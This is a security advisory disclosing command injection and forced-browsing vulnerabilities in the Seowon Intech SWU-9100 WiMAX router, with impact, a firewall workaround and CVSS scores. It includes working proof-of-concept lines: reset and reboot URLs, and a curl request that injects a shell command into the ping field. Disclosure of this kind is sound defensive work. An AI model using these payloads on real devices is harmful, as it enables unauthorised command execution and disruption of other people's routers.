Vulnerability Note VU#431726

Seowon Intech WiMAX SWU-9100 mobile router contains multiple vulnerabilities

Original Release date: 03 Feb 2014 | Last revised: 11 Feb 2014

Overview

Seowon Intech WiMAX SWU-9100 mobile routers contain command injection (CWE-77) and direct request (CWE-425) vulnerabilities.

Description

Seowon Intech WiMAX SWU-9100 mobile routers contain command injection (CWE-77) and direct request (CWE-425) vulnerabilities.

CVE-2013-7183 - CWE-425: Direct Request ('Forced Browsing')
A remote unauthenticated attacker may factory reset or reboot the router by visiting a specific URL.
http://[IP_Router]/cgi-bin/reboot.cgi?select_option_value=factory_default&reboot_option=on&action=Apply
http://[IP_Router]/cgi-bin/reboot.cgi?select_option_value=default_reboot&reboot_option=on&action=Apply

CVE-2013-7179 - CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
The following is a proof-of-concept for the command injection vulnerability.
curl -v --data "select_mode_ping=on&ping_ipaddr=127.0.0.1>/dev/null; ls -lash /etc%23&ping_count=1&action=Apply&html_view=ping" "http://[IP_Router]/cgi-bin/diagnostic.cgi" > /dev/null

The CVSS score below is for CVE-2013-7179.

Impact

A remote unauthenticated attacker may be able to inject commands, reboot, or may perform a factory reset on the device.

Solution

We are currently unaware of a practical solution to this problem. Please consider the following workaround.

Restrict Access

Enable firewall rules so only trusted sources may access the device. Do not allow web administration from the WAN interface.

Vendor Information (Learn More)

VendorStatusDate NotifiedDate Updated
Seowon Intech IncAffected09 Jan 201403 Feb 2014
If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)

Group Score Vector
Base 8.3 AV:A/AC:L/Au:N/C:C/I:C/A:C
Temporal 6.4 E:POC/RL:W/RC:UC
Environmental 1.6 CDP:ND/TD:L/CR:ND/IR:ND/AR:ND

References

Credit

Thanks to Josue Rojas for reporting this vulnerability.

This document was written by Jared Allar.

Other Information

  • CVE IDs: CVE-2013-7179 CVE-2013-7183
  • Date Public: 03 Feb 2014
  • Date First Published: 03 Feb 2014
  • Date Last Updated: 11 Feb 2014
  • Document Revision: 22

Feedback

If you have feedback, comments, or additional information about this vulnerability, please send us email.